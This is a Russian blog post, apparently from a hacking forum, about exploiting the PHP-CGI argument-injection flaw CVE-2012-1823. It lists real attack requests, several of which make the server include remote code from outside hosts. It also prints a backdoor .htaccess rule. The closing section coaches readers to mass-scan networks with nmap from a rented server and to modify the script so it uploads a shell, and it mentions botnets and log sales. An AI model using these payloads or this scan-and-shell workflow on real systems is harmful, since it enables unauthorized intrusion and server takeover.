Эксплоитация PHP CGI

в 9:31, , рубрики: php, взлом, информационная безопасность, метки: ,

Хроника событий:

В ходе конкурса NUllcon CTF который проходил в январе этого года, участниками была обнаружена новая уязвимость в PHP, связанная с работой интерпретатора в режиме CGI. Explot-db пополнился эксплойтом к данной уязвимости 5 мая. Уязвимость позоляет атакующему, выполнить произвольный код на стороне сервера, тем самым получив полный контроль на ним.

Cve-2012-1823
PHP CGI Argument Injection Exploit

На данный момент, эксплойтом заинтересовались 9647 человек. Попытки эксплуатировать эту уязвимость были замечены практически сразу. Больше всех пострадал хостер Dreamhost.

Компания DreamHost, которая предоставляет услуги хостинга более чем 1 миллиону сайтов, поделилась с Trustwave своими журналами событий, анализ которых показал, что в течение первых нескольких дней после того, как появилась информация об уязвимости, произошло более 200 тысяч атак на более чем 150 тысяч доменов, размещенных на серверах DreamHost.

Основной целью атакующих, эксплуатирующих уязвимость CGI настройки php-cgi, было создание бекдора. В одном из примеров эксплоитов, которые получили эксперты Trustwave, содержался такой код:

'<IfModule mod_rewrite.c>'.chr(10).
'RewriteEngine On'.chr(10).
'RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]'.chr(10).
'RewriteRule ^(.*) $1? [L]'.chr(10).
'
'.

Эти правила mod_rewrite добавляются к файлам .htaccess и являют собой простейший способ дальнейшей эксплуатации уязвимости. Таким образом, атакующие пытаются сделать так, чтобы другой хакер не смог повторно взломать систему.
Далее представлен топ 10 запросов которые пытаются эксплуатировать эту уязвимость:

198489 'GET /index.php?-s'
7837 'GET /blog/index.php?-s'
6078 'GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.5999mu.com/a.txt'
2075 'GET /index.php?-s/wp-admin/install.php'
1790 'GET /wordpress/index.php?-s'
1605 'GET /wp/index.php?-s'
862 'POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron'
670 'GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi'
534 'POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dphp:%2f%2finput'
422 'GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.qz0451.com/1.txt'

По видимому, шустрые хакеры, написали сканнер который эксплуатирует сервера по заданному диапазону адресов. Каждый из вышепредставленных запросов, выполняет на сервере команду. Некоторые запросы сразу заливают шелл, а некоторые просто отключают директивы безопасности.

Эксперты по безопасности, тоже не заставили публику долго ждать. Был написан скрипт для сетевого сканнера nmap который эксплуатирует эту уязвимость. Далее был сделан апдейт сканера до 6 версии, в которую был включен скрипт для эксплуатации уязвимости.

Чтобы попробовать свои силы в хакинге с помощью nmap. Вам пондобится дедик на котором можно без шума запустить сканнер на сканирование определенного диапазона сетей с открытым 80 портом.
Запустив сканнер со следующии параметрами:

nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/index.php 10.10.0.0/22
Где:

http-vuln-cve2012-1823 – скрипт сканирующий диапазоны сетей.

http-vuln-cve2012-1823.uri=/index.php – аргумент указывающий на то к какому файлу на сервре обращатся.

10.10.0.0/22 – диапазаон IP адресов.

В результате сканирования, nmap выдаст вам результаты, содержашие уязвимые хосты.

ORT STATE SERVICE REASON
80/tcp open http syn-ack
http-vuln-cve2012-1823:
VULNERABLE:
PHP-CGI Remote code execution and source code disclosure
State: VULNERABLE (Exploitable)

Также не нужно забывать что вы можете открыть директорию nmap и отредактировать скрипт для того чтобы он к примеру заливал шелл. Для этого вместо параметра ‘?-s’ нужно установить строку ‘?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://путь до шелла на вашем сервере/a.txt’

Осталось добавить, что масштабы заражения потрясающи. Кое кто уже обзавелся ботнетом, объемами траффика и во всю продает логи на нашем форуме

Успехов.

Автор: v1skas


* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js